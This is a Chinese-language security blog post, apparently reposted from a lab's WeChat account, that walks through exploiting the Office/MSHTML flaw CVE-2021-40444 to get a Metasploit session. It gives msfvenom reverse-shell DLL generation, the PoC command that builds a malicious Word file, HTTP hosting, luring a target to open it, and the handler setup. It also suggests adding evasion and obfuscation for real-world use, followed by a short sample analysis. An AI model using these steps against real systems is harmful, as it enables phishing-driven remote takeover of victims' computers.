利用CVE-2021-40444漏洞钓鱼执法上线MSF

admin 2025年2月24日14:05:36评论15 views字数 2443阅读8分8秒阅读模式

声明

以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

0x01 漏洞描述

2021年9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。
Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。

0x02 漏洞影响

漏洞编号:CVE-2021-40444
影响版本:Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本,覆盖面比较广泛,主要用于Office钓鱼。

0x03 测试环境

攻击机:kali-linux 2022.1
靶机:windows 10(office 2013)
本次漏洞使用lockedbyte师傅的POC,结合kali-linux中metersploit工具
下载地址:
(https://github.com/lockedbyte/CVE-2021-40444) 

0x04 漏洞应用场景

4.1 Kali安装依赖包
sudo apt-get install lcab -y
利用CVE-2021-40444漏洞钓鱼执法上线MSF

4.2 生成含有后门的dll
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f dll -o http.dll
利用CVE-2021-40444漏洞钓鱼执法上线MSF
下载Poc,进入CVE-2021-40444文件目录下修改exploit.py权限添加写权限,将生成的http.dll程序拷贝到Poc文件夹中并添加写权限。
sudo git clone https://github.com/lockedbyte/CVE-2021-40444
利用CVE-2021-40444漏洞钓鱼执法上线MSF
4.3 利用POC脚本生成含有恶意代码的word文件
sudo python3 exploit.py generate http.dll 本地服务器URL
利用CVE-2021-40444漏洞钓鱼执法上线MSF
含有恶意代码的Word文件生成后输出位置在out目录下。
利用CVE-2021-40444漏洞钓鱼执法上线MSF
4.4 将含有恶意代码的word文件发送给目标
进入out目录下,启动Python服务器。
python3 -m http.server 80
利用CVE-2021-40444漏洞钓鱼执法上线MSF

诱导目标用户点击含有恶意代码的word文件。
利用CVE-2021-40444漏洞钓鱼执法上线MSF
4.5 创建监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 12.12.12.134 //本地监听IPLHOST => 12.12.12.134msf6 exploit(multi/handler) > set LPORT 4444 //本地监听端口LPORT => 4444msf6 exploit(multi/handler) >exploit
4.6 漏洞触发
利用CVE-2021-40444漏洞钓鱼执法上线MSF
文件启动时与服务器获取连接。
利用CVE-2021-40444漏洞钓鱼执法上线MSF
目标主机成功上线MSF。
利用CVE-2021-40444漏洞钓鱼执法上线MSF

0x05 病毒样本分析

5.1 本地杀软病毒样本检测
利用CVE-2021-40444漏洞钓鱼执法上线MSF
5.2 在线病毒样本检测
恶意文件执行流程,文件中创建了MSOSYNC.EXE进程,该进程主要收集操作系统硬件相关的指信息
(MachineGuid,DigitalProductId,SystemBiosDate)获取系统信息,包含查询计算机时区的功能。
利用CVE-2021-40444漏洞钓鱼执法上线MSF
5.3 样本分析详情
解压样本文件
利用CVE-2021-40444漏洞钓鱼执法上线MSF
样本文件中的document.xml.rels中存储了指向的恶意html网站链接,浏览器会自动打开网站链接。
利用CVE-2021-40444漏洞钓鱼执法上线MSF
该URL下载一个名为word.html,HTML中的JavaScript包含一个指向CAB文件的对象和一个指向INF文件的iframe. CAB文件已打开,INF文件存储在%TEMP%Low目录中
由于CAB中存在路径遍历(ZipSlip)漏洞,因此可以将INF存储在%TEMP%中,使用“.cpl:”指令打开INF文件,导致通过rundll32侧面加载INF文件。
利用CVE-2021-40444漏洞钓鱼执法上线MSF
攻击者通过伪造cab文件内嵌含有载荷的dll文件,借助漏洞使html文件JavaScript加载含有恶意代码的dll,从而远程执行payload。
文中漏洞利用并未进行免杀处理,如在生产环境下利用时,可结合Office宏病毒等免杀系列技巧进行免杀、混淆,从而获取目标控制权限。

参考链接

  1. https://baijiahao.baidu.com/s?id=1715778340261801914

  2. https://github.com/lockedbyte/CVE-2021-40444

  3. http://www.chinainfosec.org.cn/index.php?m=content&c=index&a=show&catid=57&id=488

  4. https://blog.csdn.net/qq_43332010/article/details/120463783

  5.  https://www.ddosi.org/cve-2021-40444-exp/
利用CVE-2021-40444漏洞钓鱼执法上线MSF
利用CVE-2021-40444漏洞钓鱼执法上线MSF
利用CVE-2021-40444漏洞钓鱼执法上线MSF

▇ 扫码关注我们 ▇

长白山攻防实验室

学习最新技术知识

原文始发于微信公众号(长白山攻防实验室):利用CVE-2021-40444漏洞钓鱼执法上线MSF

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月24日14:05:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用CVE-2021-40444漏洞钓鱼执法上线MSFhttps://cn-sec.com/archives/1076355.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息